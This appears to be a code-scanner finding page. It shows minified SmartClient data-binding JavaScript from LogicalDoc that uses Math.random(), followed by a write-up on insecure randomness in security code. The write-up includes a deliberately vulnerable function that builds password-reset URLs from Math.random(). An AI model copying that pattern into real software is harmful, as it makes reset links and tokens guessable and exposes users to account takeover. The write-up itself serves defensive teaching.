_6=_1.validators.find("type","integerRange")||_1.validators.find("_constructor","integerRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}}723return Math.round(_4+(Math.random()*(_5-_4)));case"float":case"decimal":case"double":var _4=0,_5=10,_7=2;if(_1.validators){var _6=_1.validators.find("type","floatRange")||_1.validators.find("_constructor","floatRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);_4=_6.min||0;_5=_6.max||Math.min(_4,10);if(_4>_5)_4=_5}724var _8=_1.validators.find("type","floatPrecision")||_1.validators.find("_constructor","floatPrecision");if(_8){_7=_8.precision||2}}725return(_4+(Math.random()*(_5-_4))).toFixed(_7);case"date":case"time":case"datetime":var _9=new Date();if(_1.validators){var _6=_1.validators.find("type","dateRange")||_1.validators.find("_constructor","dateRange");if(_6){this.logWarn(_1.name+" has "+_6.type+" validator  with min "+_6.min+" and max "+_6.max);if(_6.min)_9=_6.min;else if(_6.max)_9=_6.max}}726
return _9;default:return"textValue"}},isc.A.getSerializeableFields=function isc_DataSource_getSerializeableFields(_1,_2){var _3=this.Super("getSerializeableFields",arguments);var _4=_3.fields;_4=isc.getValues(_4);for(var i=0;i<_4.length;i++){var _6=_4[i]=isc.addProperties({},_4[i]);var _7=_6.validators;if(_7){_6.validators=_7.findAll("_generated",null);if(_6.validators==null)delete _6.validators}}727_3.fields=_4;return _3},isc.A.getMethods=function isc_DataSource_getMethods(){var _1=this.methods||[];if(this.superDS()!=null){_1.addAll(this.superDS().getMethods())}728return _1},isc.A.getDeclaredMethod=function isc_DataSource_getDeclaredMethod(_1){var _2=this.getMethods();for(var i=0;i<_2.length;i++){if(_2[i].name==_1){return _2[i]}}},isc.A.getStringMethod=function isc_DataSource_getStringMethod(_1,_2){var _3=this.getDeclaredMethod(_1);if(_3){var _4=isc.addProperties({},_3);_4.value=_2;return isc.StringMethod.create(_4)}729var _5=isc.DataSource.getNearestSchemaClass(this),_6;if(_5&&_5._stringMethodRegistry&&_5._stringMethodRegistry[_1]!==_6)730{return isc.StringMethod.create({value:_2})}},isc.A.$378=function isc_DataSource__handleXMLReply(_1,_2,_3,_4){var _5=_1,_6=_4._dsRequest,_7=this.getOperationBinding(_6),_8;if(_3.status<0){var _9=_2||_3.data;this.$38b(_9,{status:_3.status,data:_9},_6,_3,_4);return}

File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_DataBinding.js
Code:

2481this.keyIndex={};this.reverseKeyIndex={};this.saveKeyIndex()},getNativeStoredValuesCount:function(){var count=0;for(var i=0;i<this.poolSize;i++){count+=this.userDataSpan[i].xmlDocument.firstChild.attributes.length}2482return count},getKeyForNativeIndex:function(index){var iCounter=0;for(var i=0;i<this.poolSize;i++){if(iCounter+this.userDataSpan[i].xmlDocument.firstChild.attributes.length>index){var offsetIndex=index-iCounter;var attrName=this.userDataSpan[i].xmlDocument.firstChild.attributes[offsetIndex].name,attrNum=attrName.substring(1),dsKey=this.getKeyIndexValue(i,attrNum);return this.getUserKey(dsKey)}}},getKeyIndexValue:function(index,attrName){var attrNum=attrName.substring(1);if(index==0){return"00000".substring(attrNum.length)+attrNum}2483return index*10000+(1*attrNum)},getUserKey:function(userKey){return this.reverseKeyIndex[userKey]},getDataStoreKey:function(key){return this.keyIndex[key]},$70p:function(dataStore,attr){return this.userDataSpan[dataStore].getAttribute(attr)},getValue:function(userKey){var key=this.getDataStoreKey(userKey),undef;if(key===undef)return null;var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1);return this.$70p(dataStore,attr)},putValue:function(userKey,value){var key=this.getDataStoreKey(userKey);if(key){var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1),savedValue=this.$70p(dataStore,attr)}else{var dataStore=this.getDataStoreForNewItem(),attr=this.getNextAttributeName(dataStore)}2484this.userDataSpan[dataStore].setAttribute(attr,value);try{this.userDataSpan[dataStore].save("isc_userData_"+dataStore);this.addToKeyIndex(userKey,dataStore,attr)}catch(e){if(isc.Offline.isStorageException(e)){if(savedValue){this.userDataSpan[dataStore].setAttribute(attr,savedValue)}else{this.userDataSpan[dataStore].removeAttribute(attr);this.removeFromKeyIndex(userKey)}}2485throw e}},removeValue:function(userKey){var key=this.getDataStoreKey(userKey),undef;if(key===undef){Offline.logDebug("userData: 
in removeValue, no value for key '"+userKey+"' was found");return}2486var dataStore=(""+key).substring(0,1),attr="v"+((""+key).substring(1)*1);this.userDataSpan[dataStore].removeAttribute(attr);this.userDataSpan[dataStore].save("isc_userData_"+dataStore);this.removeFromKeyIndex(userKey);this.unusedAttributeNumbers[dataStore].push(attr.substring(1)*1)},getDataStoreForNewItem:function(){var undef;if(this.nextDataStoreToUse===undef){this.nextDataStoreToUse=Math.floor(Math.random()*this.poolSize)}2487var rtnValue=this.nextDataStoreToUse++;if(this.nextDataStoreToUse>=this.poolSize)this.nextDataStoreToUse=0;return rtnValue},buildNextAttributeInfo:function(){this.nextAttributeNumber=[];this.unusedAttributeNumbers=[];for(var i=0;i<this.poolSize;i++){this.unusedAttributeNumbers[i]=[];var attrs=this.userDataSpan[i].xmlDocument.firstChild.attributes;var work=[];for(var j=0;j<attrs.length;j++){var num=attrs[j].name.substring(1)*1;if(!isNaN(num))work.add(attrs[j].name.substring(1)*1)}2488if(work.sort)work.sort();else this.sort(work);var counter=0;for(j=0;j<work.length;j++){if(work[j]==counter){counter++;continue}2489while(work[j]!=counter&&counter<=9999){this.unusedAttributeNumbers[i].push(counter++)}2490counter++}2491this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}


Using Insufficiently Random Generators in Cryptography

Standard (statistical) pseudorandom number generators are easily predictable, which weakens the cryptographic protection of the application.

Example

Let’s take a look at a function that randomly generates a URL to a page:

JavaScript

function generateReceiptURL(baseUrl) {
    return (baseUrl + Math.random() + '.html');
}

This method can be used to process a user request to edit account settings. The user sends a password change request, the system sends a link to a generated page to the user’s email address, and the user accesses the password change form on it.

The link to the page is generated from a random value obtained by calling the Math.random() method [1]. This method produces predictable pseudorandom numbers, and if the malicious user finds out that it is used, he can easily guess the value of the link.

The malicious user can then send a password reset request in the victim's name and reset the current password. This lets him take over the victim's account without first gaining access to it.

Potential consequences

• If the random numbers are used in defense mechanisms, such as session ID generation or cryptographic keys, predictable values seriously compromise security. The malicious user can predict the generated value, obtain the key, and gain access to the protected resource.

• If the application uses a random value to generate a resource ID, and the value is easily predictable, the malicious user can access the resource, or replace it with his own copy with a backdoor in it.

• If the authorization and authentication mechanisms are based on random numbers (such as secret key generation), the malicious user can guess the key value and access protected system modules.

Removal recommendations

• Pseudorandom generators are split into statistical and cryptographic ones. We recommend using cryptographic generators, since they produce a pseudorandom sequence that is difficult to predict.

• JavaScript currently provides a cryptographic random number generator through the RandomSource [2] interface.

• We recommend looking into random number generators that use physical processes as their entropy source, such as atmospheric noise.